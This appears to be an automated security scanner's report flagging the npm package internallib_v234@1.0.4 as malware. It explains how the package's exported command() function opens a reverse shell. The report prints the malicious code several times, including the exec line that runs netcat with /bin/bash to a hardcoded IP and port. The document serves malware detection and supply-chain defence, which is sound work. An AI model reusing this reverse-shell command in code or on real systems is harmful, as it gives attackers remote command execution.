internallib_v234@1.0.4

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package exposes a function that launches a netcat reverse shell to a hardcoded private IP and port. A bundled check.js demonstrates calling the exported function.

Static reason
High-risk behavior combination matched malicious policy; source fingerprint signature matched known malicious package; routed for review
Trigger
runtime call to exports.command()
Impact
remote shell access as the invoking user if command() is called in an environment where the endpoint is reachable
Mechanism
child_process.exec launches netcat with /bin/bash attached
Attack narrative
When a consumer calls command(), index.js logs a marker and executes /bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash" via child_process.exec. This attaches an interactive shell to a network connection, giving the listener command execution as the package user if reachable.
Rationale
Direct source inspection confirms concrete reverse-shell behavior in the package main entrypoint, with check.js showing a caller path. Lack of lifecycle execution reduces automatic trigger scope but does not make the exported remote shell benign.
Evidence
index.js, check.js, package.json, /bin/bash
Network endpoints (1)
10.0.74.133:13337

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js imports child_process.exec.
  • index.js exports command() that runs /bin/bash -c with nc reverse shell.
  • index.js connects to 10.0.74.133:13337 and passes -e /bin/bash.
  • check.js requires internallib_v234 and calls internallib.command().
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle hooks.
  • Behavior is not import-time; exported command() must be invoked.
Behavioral surface
Source
ChildProcess, Shell
Supply chain
Trivial
Manifest
No manifest risk signals triggered.
scanned 2 file(s), 261 B of source

Source & flagged code

5 flagged
index.js
L1: const { exec } = require('child_process');
L2: ...
L4: console.log("vert16x");
L5: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"');
L6: return "deu bom";
Critical
Reverse Shell

Source matches reverse-shell style process and socket wiring.

index.js · L1
Trigger-reachable chain: manifest.main -> index.js
L1: const { exec } = require('child_process');
L2: ...
L4: console.log("vert16x");
L5: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"');
L6: return "deu bom";
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.js · L1
L1: const { exec } = require('child_process');
L2:
High
Child Process

Package source references child process execution.

index.js · L1
L4: console.log("vert16x");
L5: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"');
L6: return "deu bom";
High
Shell

Package source references shell execution.

index.js · L4
matchType = malicious_source_fingerprint_signature
signature = e65a49ea38f1fe3e
signatureType = suspicious_hashes
sourceLabel = Datadog
matchedPackage = internallib_v730@1.0.4
matchedPath = index.js
matchedIdentity = npm:aW50ZXJuYWxsaWJfdjczMA:1.0.4
similarity = 1.000
shingleOverlap = 2
summary = Datadog malicious npm corpus sample: samples/npm/malicious_intent/internallib_v730/1.0.4/2025-07-07-internallib_v730-v1.0.4.zip
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.js

Findings

2 Critical · 3 High · 1 Low
Critical · Reverse Shell · index.js
Critical · Trigger Reachable Dangerous Capability · index.js
High · Child Process · index.js
High · Shell · index.js
High · Known Malware Source Fingerprint Signature · index.js
Low · Scripts Present